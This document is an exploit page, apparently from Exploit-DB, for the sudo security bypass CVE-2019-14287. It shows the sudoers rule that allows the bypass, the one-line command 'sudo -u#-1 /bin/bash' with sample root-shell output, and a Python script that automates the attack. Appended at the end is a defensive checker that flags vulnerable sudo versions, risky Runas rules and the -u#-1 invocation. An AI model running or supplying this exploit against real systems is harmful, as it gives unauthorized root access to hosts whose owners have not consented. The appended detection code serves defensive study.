sudo 1.8.27 – Security Bypass

  • Author: Mohin Paramasivam
    Date: 2019-10-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47502/
  • # Exploit Title : sudo 1.8.27 - Security Bypass
    # Date : 2019-10-15
    # Original Author: Joe Vennix
    # Exploit Author : Mohin Paramasivam (Shad0wQu35t)
    # Version : Sudo <1.8.28
    # Tested on Linux
    # Credit : Joe Vennix from Apple Information Security found and analyzed the bug
    # Fix : The bug is fixed in sudo 1.8.28
    # CVE : 2019-14287
    
    '''Check for the user sudo permissions
    
    sudo -l 
    
    User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash
    
    
    So user hacker can't run /bin/bash as root (!root)
    
    
    User hacker sudo privilege in /etc/sudoers
    
    # User privilege specification
    root    ALL=(ALL:ALL) ALL
    
    hacker ALL=(ALL,!root) /bin/bash
    
    
    With ALL specified, user hacker can run the binary /bin/bash as any user
    
    EXPLOIT: 
    
    sudo -u#-1 /bin/bash
    
    Example : 
    
    hacker@kali:~$ sudo -u#-1 /bin/bash
    root@kali:/home/hacker# id
    uid=0(root) gid=1000(hacker) groups=1000(hacker)
    root@kali:/home/hacker#
    
    Description :
    Sudo doesn't check for the existence of the specified user ID and executes the command with an arbitrary user ID using the sudo privileges.
    -u#-1 returns as 0, which is root's ID, and /bin/bash is executed with root permission.
    Proof of Concept Code :
    
    How to use :
    python3 sudo_exploit.py
    
    '''
    
    
    #!/usr/bin/python3
    
    import os
    
    #Get current username
    
    username = input("Enter current username :")
    
    
    #check which binary the user can run with sudo
    
    os.system("sudo -l > priv")
    
    
    os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
    
    binary_file = open("binary")
    
    binary= binary_file.read()
    
    #execute sudo exploit
    
    print("Lets hope it works")
    
    os.system("sudo -u#-1 "+ binary)
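
For defenders, the three things described above (a sudo version older than 1.8.28, a Runas list that pairs ALL with a negation such as !root, and an invocation using -u#-1) can each be checked for. The following is an added example, not part of the original exploit or of sudo itself; the function names, the `backup` rule and the sample command lines are constructed for illustration.

```python
import re

FIXED = (1, 8, 28)  # first fixed release according to the page
RUNAS = re.compile(r"=\s*\(([^):]*)(?::[^)]*)?\)")  # "(users[:groups])" after "host ="
NUMERIC_UID = re.compile(r"-u\s*['\"]?#(-?\d+)")    # sudo -u#<uid>

def is_vulnerable_version(sudo_v_output):
    """True if the first x.y.z in `sudo -V` style text is older than 1.8.28."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", sudo_v_output)
    return bool(m) and tuple(map(int, m.groups())) < FIXED

def risky_rules(sudoers_text):
    """Rules whose Runas user list pairs ALL with a negated entry such as !root."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # skip blanks and comment lines
            continue
        m = RUNAS.search(line)
        users = [u.strip() for u in m.group(1).split(",")] if m else []
        if "ALL" in users and any(u.startswith("!") for u in users):
            hits.append(line)
    return hits

def suspicious_commands(commands):
    """Command lines asking sudo for UID -1 (or the same value as unsigned 32-bit)."""
    out = []
    for cmd in commands:
        m = NUMERIC_UID.search(cmd)
        if m and int(m.group(1)) % 2**32 == 0xFFFFFFFF:
            out.append(cmd)
    return out

# Constructed sample input: the sudoers entries shown on the page plus one safe rule.
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
hacker ALL=(ALL,!root) /bin/bash
backup ALL=(postgres) /usr/bin/pg_dump
"""
COMMANDS = ["sudo -u#-1 /bin/bash", "sudo -u postgres /usr/bin/pg_dump", "sudo -u#1000 id"]

if __name__ == "__main__":
    print(is_vulnerable_version("Sudo version 1.8.27"))
    print(risky_rules(SUDOERS))
    print(suspicious_commands(COMMANDS))
```

Distribution packages may carry a backported fix under an older version string, so treat the version check as a first-pass heuristic and confirm against the vendor's advisory.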